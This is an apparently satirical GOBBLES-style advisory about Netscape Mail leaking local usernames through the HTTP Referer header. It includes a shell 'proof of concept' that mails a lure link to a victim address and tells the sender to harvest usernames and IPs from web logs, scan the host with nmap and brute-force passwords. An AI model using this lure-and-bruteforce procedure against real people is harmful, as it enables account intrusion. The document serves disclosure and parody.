see also, GOBBLES tribute... ah, them were the dayz... ;P~
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++GOBBLES+SECURITY+RESEARCH+TEAM+INCORPORATED+++++++++++++++++
ALERT! ALERT! LAME INFORMATION LEAKAGE BUG IN NETSCAPE MAIL! ALERT! ALERT!
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#include "/tmp/.warez/0day/banter.h"
OK GOBBLES promise to keep this advisory short because this bug is not
complex like many others and is not a necessary precaution in this current
advisory.
Something GOBBLES have always wondered about is the different webbrowsers
and why no programmers are able to program a good webbrowser that does not
consume all system resources at all times. And GOBBLES also does not know
why it is that no webbrowser programming teams are able to make their
webbrowser products table. It is so annoying when GOBBLES is looking at
he favorite websites and iexplore.exe die and all GOBBLES application
close down with it! And the Mozilla (appropriately named for being such a
big bloated ugly green beast) is only better because it do not kill the
desktop shell when it die, but it die more frequently which is many more
annoying too. And the Opera is very nice except it do not implement all
the nice web features properly and can be annoying when looking at certain
pay adult sites that GOBBLES are fond of!
PRODUCT
*******
Netscape Mail (aka nsmail)
website: www.netscape.com
BACKGROUND
**********
GOBBLES were browsing through packetstormsecurity.org and found an
interesting paper which are called "Passive System Fingerprinting using
Network Client Applications" written by Jose Nazario which can be found on
on GOBBLES favorite security site which is packetstormsecurity.org at
http://packetstormsecurity.org/papers/protocols/passive.pdf. The idea
of this paper is that information can be found when monitoring network
traffic to determine information on a certain host on a network without
actually making any new traffic to a host which could trigger the IDS
systems.
SECURITY HISTORY
****************
hehehe too many to list! Go www.securityfocus.com and search for
Netscape and you will see that they have a worse security history than
the WUFTPD daemon! GOBBLES think you get the idea, hehehehe. Why
people use software programs with such significant security history is
beyond GOBBLES comprehension! If a program is knowed for having many
bugs why can you trust its security when the teams do not seem to be
improving on they programming abilities?
VERSIONS AFFECTED
*****************
All versions of Netscape Mail that the GOBBLES researchers tested seemed
to be vulnerable to this attack.
NOT TESTED
**********
Internet Explorer, Pegasus Mail, and Eudora Mail.
THE PROBLEM
***********
OK here is what happen. If someone are running Netscape Mail as their
mail client and they are emailed a hyperlink (GOBBLES suggest the study
of RFC2817 if you do not understand these) and they click on it from
inside nsmail, then the webbrowser Netscape is run. When doing the HTTP
protocol negotiation with the HTTP server it will send information in
the Referer (hehehe really in English the word is referrer but the
hackers who wrote HTTP made mistake and made it Referer! so quit making
fun of GOBBLES English when you know you do not have the brave enough to
mock the authors of HTTP!) field which contains the full pathnames to
the users account on the system. So on a *nix system it will show
/home/username/.netscape/nsmail (or /usr/home/username/.netscape/nsmail
depending on your flavor HEHEHE or the many other pathnames that it
might be) and on a Windows system it will show
C:\Program Files\Netscape\Users\username\mail.
Now you ask GOBBLES, "GOBBLES how is this a vulnerability?" Very simple
young grasshooper! Because we also get the IP of the person who is
viewing the html document! Then you can know at least one username on
their system and then we have an expanded window of attack on the system
since now we may begin attempting to bruteforce their passwords on the
system! Letting outside world know the names of your users on the
system like that is never a good thing because it allows the bruteforce
password hacking exploits to be used on your systems!
EXPLOIT DETAILS
***************
GOBBLES have provided a full working POC (proof of concept) exploit for
this problem so that you can better understand it yourself. It requires
that you edit the sourcecode to make it work though hehehe so it
prevents some people from maliciously abusing it! Here are the exploit!
----------------------------cut here-------------------------------------
#!/bin/sh
# PROOF OF CONCEPT EXPLOIT FOR THE INFORMATION LEAK VULNERABILITY
# IN NETSCAPE MAIL (NSMAIL) DISCOVERED BY GOBBLES OF THE GOBBLES
# SECURITY RESEARCH TEAM. THIS EXPLOIT HAS BEEN FULLY DISCLOSED
# BUT SHOULD NOT BE USED FOR ANY MALICIOUS PURPOSES. IT WILL NOT
# WORK WITH OUT SOME MODIFICATIONS SO IT IS REQUIRED THAT THE
# PERSON USING IT HAS SOME KNOWLEDGE OF SHELL SCRIPTING. THIS WILL
# MAKE IT ONLY WORK FOR THE PENTESTERS WHO CAN APPRECIATE THE
# GOODNESS OF THIS EXPLOIT AND SHOULD HOPEFULLY PREVENT IT FROM
# BEING USED BY PEOPLE WITH MALICIOUS INTENTIONS! ENJOY!
# LOVE,
# GOBBLES
# ok, phase one, creating our payload!
/usr/bin/clear
echo '[*] EXPLOIT FOR NETSCAPE MAIL [*]'
echo '[*] written by GOBBLES [*]'
echo '[*] ABUSE IT AND YOU LOSE IT! [*]'
echo '[*] step one: create letter!! [*]'
umask 077
cat << _GOBBLES_ >/tmp/evil-letter
Hi Friend,
please visit my new website at
http://www.somesitethatismonitored.com/monitoredhtml.html
and let me know what you think!
Thank you friend!
Love,
GOBBLES
http://www.bugtraq.org
GOBBLES@hushmail.com
_GOBBLES_
echo '[*] ok now phase one complete! [*]'
echo '[*] ok now on to phase two! [*]'
echo '[*] step two: sending email ;) [*]'
cat /tmp/evil-letter | /bin/mail victim@suspectedNSMAILuser.com
echo '[*] ok, step two now all done! [*]'
echo '[*] now cleaning up our mess!! [*]'
rm -rf /tmp/evil-letter
echo '[*] Cleanup all complete now!! [*]'
echo '[*] To complete process wait [*]'
echo '[*] for the victim to click on [*]'
echo '[*] the link then check your [*]'
echo '[*] http logs for the username [*]'
echo '[*] and IP then use your nmap [*]'
echo '[*] to find what the computer [*]'
echo '[*] is running then try to [*]'
echo '[*] bruteforce your way in!!!! [*]'
echo '[*] heheheh HAVE A LOT OF FUN! [*]'
echo '[*] LOVE, [*]'
echo '[*] GOBBLES [*]'
echo '[*] http://www.bugtraq.org [*]'
echo '[*] GOBBLES@hushmail.com [*]'
----------------------------now cut here---------------------------------
VENDOR NOTIFICATION STATUS
**************************
GOBBLES Team did decide not to bother letting the Netscape programmers
know about this problem before our full disclosure of the bug. Before
you use this as a reason to start writing nasty email to GOBBLES about
this action you need to consider the why we did it which is because we
believe that the Netscape programmers are not too considerate about the
security of their software anyways since there are always so many bugs
in them being disclosed. They do sloppy work and sloppy work should not
receive any special attention other than scorn which is what you should
be feeling to them right now.
SUGGESTED WORKAROUNDS
*********************
Until the Netscape people can make a fix for this GOBBLES and friends
have a few suggestions as to how you might work around this bug.
[1] Use a better mail client like Pine or Elm or mutt or mailx.
[2] Use web-based services to retrieve and view your email. Microsoft's
Hotmail works good for this http://www.hotmail.com.
[3] Do not use your Netscape Mail anymore until the problem is fixed.
GREETS
******
dianora, tsk, snow, carolyn meinel, john vranesevich, steve gibson, kimble,
knightmare, emmanuel goldstein, box.sk, @stake, securityfocus, sans.org,
blackhat.com, defcon.org, 2600.com, #phrack@efnet, #hackphreak@undernet,
bugtraq (thanks aleph1 and david ahmad for devoting your time to a great
list), ntbugtraq (russel the love muscle ;D), cert.org, paul vixie, vesselin
bontchev, reese witherspoon, kirsten dunst, katie holmes, aleister crowley,
manly p hall, franz bardon, dennis ritchie, nietzsche, w. richard stevens,
radiohead, george michael, larry wall, beethoven, francis bacon (the one and
only true william shakespeare), bruce willis, bruce schneier, alan turing,
john von neumann, donald knuth, michael abrash, robert sedgewick, richard
simmons, goverment boy, ralph lauren (clothing designer to the true hackers),
and all our friends and family.
oh yeah and a P.S. from GOBBLES!
ps: is Lady Caroline from the Cult of the Dead Cows the same person as
Caroline Meinel from happyhacker.org? GOBBLES is only curious and
if you can confirm our suspicions please email us ASP!